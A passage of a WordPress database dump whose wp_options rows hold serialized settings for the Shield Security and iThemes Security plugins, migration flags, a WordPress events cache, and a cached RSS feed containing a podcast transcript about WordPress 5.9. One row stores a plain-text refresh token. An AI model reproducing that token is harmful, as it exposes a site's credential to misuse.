";s:1:\"N\";s:16:\"clean_wp_rubbish\";s:1:\"N\";s:24:\"api_namespace_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}}','yes'),(56186,'icwp_wpsf_ips_options','a:16:{s:10:\"enable_ips\";s:1:\"N\";s:11:\"auto_expire\";s:6:\"minute\";s:16:\"text_loginfailed\";s:7:\"default\";s:9:\"track_404\";s:3:\"log\";s:19:\"text_remainingtrans\";s:7:\"default\";s:19:\"transgression_limit\";i:10;s:17:\"track_loginfailed\";s:20:\"transgression-single\";s:17:\"user_auto_recover\";a:0:{}s:16:\"track_linkcheese\";s:8:\"disabled\";s:12:\"track_xmlrpc\";s:3:\"log\";s:18:\"track_logininvalid\";s:3:\"log\";s:20:\"track_fakewebcrawler\";s:3:\"log\";s:15:\"track_useragent\";s:3:\"log\";s:17:\"request_whitelist\";a:0:{}s:20:\"legacy_db_deleted_at\";i:1632315672;s:19:\"track_invalidscript\";s:3:\"log\";}','yes'),(56187,'icwp_wpsf_statistics_options','a:2:{s:17:\"enable_statistics\";s:1:\"Y\";s:22:\"current_plugin_version\";s:5:\"6.8.2\";}','yes'),(56188,'icwp_wpsf_audit_trail_options','a:4:{s:18:\"enable_audit_trail\";s:1:\"N\";s:22:\"audit_trail_auto_clean\";i:7;s:20:\"legacy_db_deleted_at\";i:1632315672;s:14:\"log_level_file\";a:1:{i:0;s:8:\"disabled\";}}','yes'),(56189,'icwp_wpsf_support_options','a:2:{s:14:\"enable_support\";s:1:\"Y\";s:22:\"current_plugin_version\";s:6:\"5.16.4\";}','yes'),(56190,'icwp_wpsf_email_options','a:2:{s:25:\"send_email_throttle_limit\";i:10;s:22:\"current_plugin_version\";s:5:\"6.8.2\";}','yes'),(56191,'icwp_wpsf_plugin_controller','O:8:\"stdClass\":4:{s:4:\"hash\";s:32:\"882d5d275fd62a221d85a8475034c799\";s:8:\"mod_time\";i:1559406792;s:11:\"plugin_spec\";a:9:{s:10:\"properties\";a:15:{s:7:\"version\";s:5:\"7.4.2\";s:17:\"release_timestamp\";i:1559221200;s:11:\"slug_parent\";s:4:\"icwp\";s:11:\"slug_plugin\";s:4:\"wpsf\";s:10:\"human_name\";s:6:\"Shield\";s:10:\"menu_title\";s:6:\"Shield\";s:11:\"text_domain\";s:18:\"wp-simple-firewall\";s:16:\"base_permissions\";s:14:\"manage_options\";s:23:\"wpms_network_admin_only\";b:1;s:15:\"logging_enabled\";b:1;s:21:\"show_dashboard_widget\";b:1;s:10:\"autoupdate\";s:10:\"confidence\";s:15:\"autoupdate_days\";i:2;s:16:\"options_encoding\";s:4:\"json\";s:14:\"enable_premium\";b:1;}s:12:\"requirements\";a:2:{s:3:\"php\";s:5:\"5.4.0\";s:9:\"wordpress\";s:5:\"3.5.0\";}s:5:\"paths\";a:7:{s:6:\"source\";s:3:\"src\";s:8:\"autoload\";s:23:\"lib/vendor/autoload.php\";s:6:\"assets\";s:9:\"resources\";s:9:\"languages\";s:9:\"languages\";s:9:\"templates\";s:9:\"templates\";s:5:\"flags\";s:5:\"flags\";s:5:\"cache\";s:6:\"shield\";}s:8:\"includes\";a:3:{s:5:\"admin\";a:2:{s:3:\"css\";a:1:{i:0;s:13:\"global-plugin\";}s:2:\"js\";a:2:{i:0;s:6:\"jquery\";i:1;s:13:\"global-plugin\";}}s:12:\"plugin_admin\";a:2:{s:3:\"css\";a:4:{i:0;s:10:\"bootstrap4\";i:1;s:20:\"bootstrap-select.min\";i:2;s:6:\"plugin\";i:3;s:12:\"featherlight\";}s:2:\"js\";a:8:{i:0;s:21:\"bootstrap4.bundle.min\";i:1;s:20:\"bootstrap-select.min\";i:2;s:6:\"jquery\";i:3;s:6:\"plugin\";i:4;s:10:\"base64.min\";i:5;s:13:\"lz-string.min\";i:6;s:12:\"featherlight\";i:7;s:19:\"jquery.fileDownload\";}}s:8:\"frontend\";a:1:{s:3:\"css\";N;}}s:4:\"menu\";a:7:{s:4:\"show\";b:1;s:5:\"title\";s:15:\"Shield Security\";s:9:\"top_level\";b:1;s:14:\"do_submenu_fix\";b:1;s:8:\"callback\";s:16:\"onDisplayTopMenu\";s:10:\"icon_image\";s:20:\"pluginlogo_16x16.png\";s:11:\"has_submenu\";b:1;}s:6:\"labels\";a:10:{s:4:\"Name\";s:6:\"Shield\";s:11:\"Description\";s:108:\"Ultimate WP Security Protection - Scans, 2FA, Firewall, SPAM, Audit Trail, Security Admin, and so much more.\";s:5:\"Title\";s:15:\"Shield Security\";s:6:\"Author\";s:17:\"One Dollar Plugin\";s:10:\"AuthorName\";s:17:\"One Dollar Plugin\";s:9:\"PluginURI\";s:18:\"https://icwp.io/2f\";s:9:\"AuthorURI\";s:18:\"https://icwp.io/bv\";s:14:\"icon_url_16x16\";s:20:\"pluginlogo_16x16.png\";s:14:\"icon_url_32x32\";s:20:\"pluginlogo_32x32.png\";s:16:\"icon_url_128x128\";s:22:\"pluginlogo_128x128.png\";}s:4:\"meta\";a:2:{s:13:\"url_repo_home\";s:18:\"https://icwp.io/eh\";s:20:\"headway_changelog_id\";s:6:\"xaoEZJ\";}s:11:\"plugin_meta\";a:1:{i:0;a:2:{s:4:\"name\";s:26:\"5&#10025; Rate This Plugin\";s:4:\"href\";s:22:\"https://icwp.io/wpsf29\";}}s:12:\"action_links\";a:2:{s:6:\"remove\";N;s:3:\"add\";a:2:{i:0;a:5:{s:4:\"name\";s:9:\"Dashboard\";s:5:\"title\";s:22:\"Go To Shield Dashboard\";s:4:\"href\";s:26:\"getPluginUrl_AdminMainPage\";s:6:\"target\";s:4:\"_top\";s:4:\"show\";s:6:\"always\";}i:1;a:6:{s:4:\"name\";s:20:\"&uarr; Go Pro &uarr;\";s:5:\"title\";s:29:\"For just $1/month. Seriously.\";s:4:\"href\";s:18:\"https://icwp.io/d8\";s:6:\"target\";s:6:\"_blank\";s:9:\"highlight\";b:1;s:4:\"show\";s:4:\"free\";}}}}s:21:\"update_first_detected\";a:1:{s:5:\"8.0.1\";i:1567096139;}}','yes'),(56171,'widget_icwp_wpsf_plugin_badge','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(71225,'_mm_refresh_token','57e957ba-89c0-4b05-976e-35944219cb1b','yes'),(439272,'itsec_cron','a:2:{s:6:\"single\";a:1:{s:11:\"file-change\";a:1:{s:32:\"aa7f1103787f3f10ae6f1aa41f905f30\";a:1:{s:4:\"data\";a:4:{s:4:\"step\";s:9:\"get-files\";s:5:\"chunk\";s:5:\"admin\";s:10:\"loop_start\";i:1601256962;s:9:\"loop_item\";i:1;}}}}s:9:\"recurring\";a:5:{s:17:\"purge-log-entries\";a:1:{s:4:\"data\";a:0:{}}s:11:\"clear-locks\";a:1:{s:4:\"data\";a:0:{}}s:12:\"health-check\";a:1:{s:4:\"data\";a:0:{}}s:12:\"clear-tokens\";a:1:{s:4:\"data\";a:0:{}}s:11:\"flush-files\";a:1:{s:4:\"data\";a:0:{}}}}','no'),(439279,'hustle_migrations','a:5:{i:0;s:18:\"hustle_20_migrated\";i:1;s:18:\"hustle_30_migrated\";i:2;s:18:\"hustle_40_migrated\";i:3;s:19:\"hustle_430_migrated\";i:4;s:3:\"441\";}','yes'),(439280,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"17.2\";}','yes'),(510237,'_site_transient_timeout_community-events-924b347ebb721a34ccf0c02aec9b489d','1632355326','no'),(510238,'_site_transient_community-events-924b347ebb721a34ccf0c02aec9b489d','a:4:{s:9:\"sandboxed\";b:0;s:5:\"error\";N;s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"71.120.26.0\";}s:6:\"events\";a:4:{i:0;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:60:\"Watch Party + Discussion Group: Organizing WordPress Meetups\";s:3:\"url\";s:68:\"https://www.meetup.com/learn-wordpress-discussions/events/280780344/\";s:6:\"meetup\";s:27:\"Learn WordPress Discussions\";s:10:\"meetup_url\";s:51:\"https://www.meetup.com/learn-wordpress-discussions/\";s:4:\"date\";s:19:\"2021-09-23 13:00:00\";s:8:\"end_date\";s:19:\"2021-09-23 14:00:00\";s:20:\"start_unix_timestamp\";i:1632427200;s:18:\"end_unix_timestamp\";i:1632430800;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:37.7799987792970028976924368180334568023681640625;s:9:\"longitude\";d:-122.419998168950002082056016661226749420166015625;}}i:1;a:10:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:23:\"WordCamp Galicia, Spain\";s:3:\"url\";s:34:\"https://galicia.wordcamp.org/2021/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2021-09-30 17:00:00\";s:8:\"end_date\";s:19:\"2021-10-02 00:00:00\";s:20:\"start_unix_timestamp\";i:1633014000;s:18:\"end_unix_timestamp\";i:1633125600;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"ES\";s:8:\"latitude\";d:42.5750553999999965526512823998928070068359375;s:9:\"longitude\";d:-8.13385579999999919209585641510784626007080078125;}}i:2;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:45:\"All Levels: Online Ask Us Anything WordPress!\";s:3:\"url\";s:70:\"https://www.meetup.com/The-Baltimore-WordPress-Group/events/280626840/\";s:6:\"meetup\";s:29:\"The Baltimore WordPress Group\";s:10:\"meetup_url\";s:53:\"https://www.meetup.com/The-Baltimore-WordPress-Group/\";s:4:\"date\";s:19:\"2021-10-06 19:00:00\";s:8:\"end_date\";s:19:\"2021-10-06 20:00:00\";s:20:\"start_unix_timestamp\";i:1633561200;s:18:\"end_unix_timestamp\";i:1633564800;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:39.3100013732910014141452847979962825775146484375;s:9:\"longitude\";d:-76.580001831055000138803734444081783294677734375;}}i:3;a:10:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:45:\"All Levels: Let\'s talk hosting & PHP settings\";s:3:\"url\";s:70:\"https://www.meetup.com/The-Baltimore-WordPress-Group/events/280783611/\";s:6:\"meetup\";s:29:\"The Baltimore WordPress Group\";s:10:\"meetup_url\";s:53:\"https://www.meetup.com/The-Baltimore-WordPress-Group/\";s:4:\"date\";s:19:\"2021-10-21 19:00:00\";s:8:\"end_date\";s:19:\"2021-10-21 20:00:00\";s:20:\"start_unix_timestamp\";i:1634857200;s:18:\"end_unix_timestamp\";i:1634860800;s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:39.3100013732910014141452847979962825775146484375;s:9:\"longitude\";d:-76.580001831055000138803734444081783294677734375;}}}}','no'),(510239,'_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3','1632355326','no'),(510240,'_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:79:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"News –  – WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 17 Sep 2021 07:36:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=5.9-alpha-51842\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:20:{i:0;a:6:{s:4:\"data\";s:58:\"\n		\n		\n		\n		\n		\n				\n		\n\n					\n										\n					\n		\n		\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"WP Briefing: Episode 16: A Sneak Peek at WordPress 5.9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2021/09/episode-16-a-sneak-peek-at-wordpress-5-9/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 20 Sep 2021 12:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"wp-briefing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=11248\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:423:\"In addition to this episode’s small list of big things, Josepha Haden Chomphosy reviews the upcoming 5.9 WordPress release and its Full Site Editing features. Have a question you&#8217;d like answered? You can submit them to wpbriefing@wordpress.org, either written or as a voice recording. Credits Editor:&#160;Dustin Hartzler Logo:&#160;Beatriz Fialho Production:&#160;Chloé Bringmann Song: Fearless First by [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:60:\"https://wordpress.org/news/files/2021/09/WP-Briefing-016.mp3\";s:6:\"length\";s:1:\"0\";s:4:\"type\";s:0:\"\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Chloe Bringmann\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:11753:\"\n<p>In addition to this episode’s small list of big things, Josepha Haden Chomphosy reviews the upcoming 5.9 WordPress release and its Full Site Editing features.</p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<ul><li>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a></li><li>Logo:&nbsp;<a href=\"https://profiles.wordpress.org/beafialho/\">Beatriz Fialho</a></li><li>Production:&nbsp;<a href=\"https://profiles.wordpress.org/cbringmann/\">Chloé Bringmann</a></li><li>Song: Fearless First by Kevin MacLeod</li></ul>\n\n\n\n<h2>References </h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/09/03/wordpress-5-9-planning-roundup/\">WordPress 5.9 Planning&nbsp;</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">5.9 Target Features</a></p>\n\n\n\n<p><a href=\"https://make.wordpress.org/core/2021/08/20/gallery-block-refactor-dev-note/\">Gallery Block Refactor Dev Notes</a></p>\n\n\n\n<p><a href=\"https://en.wikipedia.org/wiki/The_Cathedral_and_the_Bazaar\">The Cathedral and the Bazaar, 19 Lessons of Open Source</a></p>\n\n\n\n<p><a href=\"https://wptranslationday.org/\">WordPress Translation Day</a></p>\n\n\n\n<p><a href=\"https://us.wordcamp.org/2021/\">WordCamp US 2021</a></p>\n\n\n\n<p><a href=\"https://andreamiddleton.blog/2021/09/07/letters-to-an-open-source-contributor/\">Letters to an open source contributor, by Andrea Middleton</a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-11248\"></span>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:10</p>\n\n\n\n<p>Hello, everyone, and welcome to the WordPress Briefing. The podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks. I&#8217;m your host, Joseph Haden Chomphosy. Here we go.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>00:40</p>\n\n\n\n<p>Today I&#8217;m going to take you through a quick look at the final WordPress release of 2021. It will be WordPress 5.9. And there will be a ton of things in it, including a fresh new default theme. And there are a few things that you need to know about it right now. The target release date is December 14, 2021, which means some of our milestones happen around Thanksgiving in the US. And a few significant commercial dates globally, days, like Giving Tuesday and Black Friday, etc. I&#8217;ll include a link to the post with all the target dates in the show notes so that you can plan with those in mind. And also in the show notes. I&#8217;ll include a link to Matías Ventura&#8217;s post that includes the target features for the release. When you look at that post, you&#8217;ll notice that you can sort of group things into two big buckets. The two buckets that I grouped them into are themes plus tools, and also better tools.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>01:31</p>\n\n\n\n<p>So bucket number one themes and all their tools. Three things were important for me as I was reading through them. Number one is that there is a default theme. As of the time of this recording, I&#8217;ve seen the early concepts for the theme, and I love them. Hopefully, by the time this podcast is published, the post that showcases the look and feel will also be up on make.wordpress.org/design. If it is, I&#8217;ll include a link in the show notes to make it easy for everyone to reference.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:04</p>\n\n\n\n<p>The second thing is block themes in general. So WordPress 5.8 brought to core WordPress a lot of the infrastructure needed to create block themes. And in this release in WordPress 5.9, much of that infrastructure will be made available for folks who don&#8217;t always feel comfortable working in the code. That&#8217;s mostly UX and UI changes. So user experience and user interface changes are based on user feedback that we&#8217;ve gathered over the last six to eight months. But it also will include the long-awaited navigation block.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>02:37</p>\n\n\n\n<p>The third thing that shows up for me in this first bucket, in the themes and all their tools bucket, is the UX and interface for theme.json. The user interface that we&#8217;re making available for theme.json is a major step forward in this project has been referred to as global styles for a few years. And it kind of is what it sounds like on the box, a way for users to tap into that powerful management tool that we have built through theme.JSON.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:09</p>\n\n\n\n<p>Bucket number two, which I am calling publicly &#8220;tools for days.&#8221; But also, I refer to it as design tools, block tools, and pattern tools. I had this whole vision of a Wizard of Oz, “lions and tigers and bears. Oh my!” moment, but I couldn’t make it work. So “design tools and block tools and pattern tools Hoorah!” That&#8217;s as close as we&#8217;re getting. So that&#8217;s my first big number two bucket for you.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>03:37</p>\n\n\n\n<p>For most of these tools, the best way to describe it is quality of life improvements, lots of streamlining of what&#8217;s there, lots of building what&#8217;s not. But there&#8217;s one that&#8217;s substantial and worth digging into a bit more. And that&#8217;s the gallery block refactor. The dev note for this already exists. Like before we had the planning round-up post, the dev note was created. And so I will put a link to that in the show notes. But the headline is that this refactor will make the creation and maintenance of image blocks and the gallery block work the same way. If you are a theme or plugin developer, head on over to the dev notes that I have linked below and take some time to get familiar with it.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:20</p>\n\n\n\n<p>And then the final thing, which has a bunch of small things in it, but will make a huge impact for all of our users overall, is that we&#8217;re working on more intuitive and responsive tools on blocks. That has come up frequently in our user testing again over the last six to eight months. And we are going to chip away at that long list of needs that we have in those particular toolsets. And that&#8217;s it. So that&#8217;s a really big broad look at what we&#8217;re trying to get into the final release of the year.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>04:58</p>\n\n\n\n<p>I&nbsp; know that when I say like this is our hoped for stuff. This is our best guess at the moment. Sometimes it can feel like we should know that already &#8212; I should know already what&#8217;s going into the release. And on the one hand, yes, I believe in this list of things that we&#8217;re going to put into the release, I think they&#8217;re going to be good. But I always refer to it as like the hoped-for things, the things that are on the roadmap, our best targets, because I know that I don&#8217;t ever want to ship something that is going to be a worse experience for users. And so I always like to save the space to be able to remove a feature or remove an enhancement, a little bit closer to the time of the release, just to make sure that what we are offering is the best that we can offer. However, as it says right there in the 19 learnings of open source, “if there&#8217;s a bug, there&#8217;s a job,” right? There&#8217;s a lot of tolerance in open source software for shipping, slightly imperfect work. And that&#8217;s good. When we ship software that&#8217;s a little bit imperfect, it makes it clear how everyone can participate, how everyone could participate, if they could find this WordPress community that supports the CMS.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:20</p>\n\n\n\n<p>If you&#8217;ve never participated in a release and are interested in learning how it goes, you can always follow along on make.wordpress.org/core. And of course, we do a lot of our meetings in the making WordPress, community Slack, which you can find at chat.wordpress.org if you are not already in that particular instance.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>06:49</p>\n\n\n\n<p>That brings us now to our small list of big things. I have three things on my list for you. The first one is WP Translation day slash month. For folks who&#8217;ve been following along for a bit, you probably noticed that Translation Day has been going on all month long all of September so that we can have small individual local events and bring people into the process of translating WordPress and making WordPress more usable for more people, especially when they don&#8217;t necessarily speak English as their first language. It&#8217;s a wonderful event. There&#8217;s been Translation Day at the end of September for years. And this Translation Month is working its way up to that Translation Day; I will leave a link to the event page in the notes below. And I really encourage you to drop by.</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>07:38</p>\n\n\n\n<p>The second thing is that WordCamp US is coming up on October 1. It is going to be a virtual event, as so many of our events are right now. Tickets are open. The schedule just got published last week. And so we have a good concept of who is talking about what while we&#8217;re there. I suggest you wander over to the schedule. Take a look at anything that might be inspirational to you or anyone who looks like they&#8217;re answering questions that you&#8217;ve had as you have been trying to build your WordPress business.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:08</p>\n\n\n\n<p>And then the third thing on my smallest of big things. Some of you may already be aware that <a href=\"https://profiles.wordpress.org/andreamiddleton/\">Andrea Middleton</a> has left the WordPress project. She has been an absolute fixture in the WordPress open source project for the last ten years. And while we will all miss her terribly, her work has been so influential and so foundational that we actually won&#8217;t really feel much like she&#8217;s gone. We will see the evidence of her work in everything she does and everything she has done while we build a better and more inclusive WordPress after her.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>08:47</p>\n\n\n\n<p>As a final love letter to the community, she published a series of things that she learned about contributing to open source and especially how to contribute to WordPress as an open source project. I&#8217;m going to link those in the show notes as well. For anyone who has worked with Andrea for a long time, when you read it, it will just remind you of her voice and will be like a nice warm, comforting hug as she heads on to her next endeavors. And for folks who have never worked with her before. It&#8217;s still really excellent information that I think translates into all areas of our work, especially right now as people are moving to distributed work and remote work a bit more. Now I encourage everyone to at least give one or two of them a read.&nbsp;</p>\n\n\n\n<p><strong>Josepha Haden Chomphosy&nbsp; </strong>09:38</p>\n\n\n\n<p>That, my friends, is your small list of big things. Thank you for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11248\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:69:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"Join us for WordPress Translation Day Global Events in September 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"https://wordpress.org/news/2021/09/join-us-for-wordpress-translation-day-global-events-in-september-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 16 Sep 2021 21:51:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:9:\"polyglots\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"translation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:16:\"wptranslationday\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11215\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:126:\"WordPress contributors around the world are celebrating the sixth Global WordPress Translation Day throughout September 2021! \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"webcommsat 